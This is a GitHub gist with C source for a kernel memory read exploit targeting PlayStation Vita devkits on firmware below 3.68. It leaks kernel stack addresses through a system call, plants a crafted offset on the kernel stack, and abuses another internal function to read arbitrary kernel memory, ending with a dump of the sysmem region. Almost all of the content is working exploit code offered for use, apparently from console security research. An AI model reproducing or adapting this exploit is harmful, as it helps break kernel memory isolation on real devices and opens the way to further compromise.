Skip to content

Instantly share code, notes, and snippets.

@TheOfficialFloW
Created September 12, 2018 06:54
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 to your computer and use it in GitHub Desktop.
// Kernel read exploit for devkits with FW < 3.68 by TheFloW
#include <psp2/appmgr.h>
#include <psp2/io/dirent.h>
#include <psp2/io/fcntl.h>
#include <psp2/io/stat.h>
#include <psp2/io/devctl.h>
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#include <malloc.h>
int sceMotionDevGetEvaInfo(void *info);
int sceNgsVoiceDefinitionGetPresetInternal(void *src, int pos, void *out);
int kernel_read_word(void *dst, void *src) {
uint32_t info[0x12];
// 1) Call a function that writes sp to kernel stack
sceAppMgrLoadExec(NULL, NULL, NULL);
// 2) Leak kernel stack
sceMotionDevGetEvaInfo(info);
// 3) Get kernel stack address
uint32_t kstack_addr = info[3] & 0xFFFFF000;
uint32_t kstack_devctl_inbuf_addr = kstack_addr + 0xAF0 - 0x30;
// 4) Write data into kernel stack
uint32_t inbuf[2];
inbuf[0] = (uint32_t)src - kstack_devctl_inbuf_addr;
inbuf[1] = 0xFFFFFFFF;
sceIoDevctl("", 0, inbuf, sizeof(inbuf), NULL, 0);
// 5) Read kernel
return sceNgsVoiceDefinitionGetPresetInternal((void *)kstack_devctl_inbuf_addr, 0, dst);
}
void kernel_read(void *dst, void *src, uint32_t size) {
uint32_t i;
for (i = 0; i < size; i += 4) {
kernel_read_word(dst + i, src + i);
}
}
int main() {
uint32_t info[0x12];
// Leak kernel addresses
sceAppMgrLoadExec(NULL, NULL, NULL);
sceMotionDevGetEvaInfo(info);
uint32_t sysmem_addr = info[0] & 0xFFFFF000;
uint32_t kstack_addr = info[3] & 0xFFFFF000;
// Read sysmem
char sysmem_buf[0x1000];
kernel_read(sysmem_buf, sysmem_addr, 0x1000);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment